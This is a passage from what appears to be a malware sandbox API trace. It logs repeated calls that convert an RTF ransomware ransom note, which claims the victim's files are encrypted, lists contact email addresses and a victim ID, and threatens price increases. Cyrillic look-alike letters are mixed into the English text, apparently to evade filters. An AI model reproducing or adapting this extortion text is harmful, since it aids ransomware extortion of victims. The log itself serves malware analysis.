alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.894] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.894] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 